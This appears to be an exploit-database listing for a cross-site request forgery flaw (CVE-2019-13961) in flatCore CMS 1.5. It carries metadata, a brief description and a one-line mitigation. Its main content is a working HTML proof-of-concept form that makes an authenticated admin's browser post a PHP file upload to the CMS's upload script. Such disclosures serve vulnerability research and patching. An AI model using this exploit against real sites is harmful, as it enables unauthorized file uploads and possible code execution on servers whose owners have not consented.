header-logo
Suggest Exploit
vendor:
flatCore-CMS
by:
CodeSecLab
6.1
CVSS
HIGH
Cross Site Request Forgery (CSRF)
352
CWE
Product Name: flatCore-CMS
Affected Version From: 1.5
Affected Version To: 1.5
Patch Exists: NO
Related CWE: CVE-2019-13961
CPE: a:flatcore:flatcore:1.5
Metasploit:
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=122231https://www.infosecmatter.com/nessus-plugin-library/?id=145893https://www.infosecmatter.com/nessus-plugin-library/?id=131096https://www.infosecmatter.com/nessus-plugin-library/?id=130792https://www.infosecmatter.com/nessus-plugin-library/?id=123770https://www.infosecmatter.com/nessus-plugin-library/?id=122533https://www.infosecmatter.com/nessus-plugin-library/?id=123113https://www.infosecmatter.com/nessus-plugin-library/?id=121576https://www.infosecmatter.com/nessus-plugin-library/?id=157619
Platforms Tested: Ubuntu, Windows
2024

flatCore 1.5 – Cross Site Request Forgery (CSRF)

The exploit allows an attacker to perform Cross Site Request Forgery (CSRF) on flatCore version 1.5. By tricking an authenticated user into visiting a malicious website, the attacker can upload files to the server due to lack of proper CSRF protection. This vulnerability has been assigned CVE-2019-13961.

Mitigation:

Implementing proper CSRF tokens and origin checks can help mitigate this vulnerability in flatCore version 1.5.
Source

Exploit-DB raw data:

# Exploit Title: flatCore 1.5 - Cross Site Request Forgery (CSRF)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/flatCore/flatCore-CMS
# Software Link: https://github.com/flatCore/flatCore-CMS
# Version: d3a5168
# Tested on: Ubuntu Windows
# CVE : CVE-2019-13961

PoC:
<!DOCTYPE html>
<html>
<head>
    <title>CSRF PoC</title>
</head>
<body>
    <form action="http://flatcore3/acp/core/files.upload-script.php" method="POST" enctype="multipart/form-data">
        <input type="hidden" name="upload_destination" value="../content/files">
        <input type="hidden" name="w" value="800">
        <input type="hidden" name="h" value="600">
        <input type="hidden" name="fz" value="1000">
        <input type="hidden" name="unchanged" value="yes">
        <input type="file" name="file" value="test.php">
        <input type="submit" value="Upload">
    </form>
</body>
</html>


[Replace Your Domain Name]

Navigation

Suggest Exploit

Services By CQR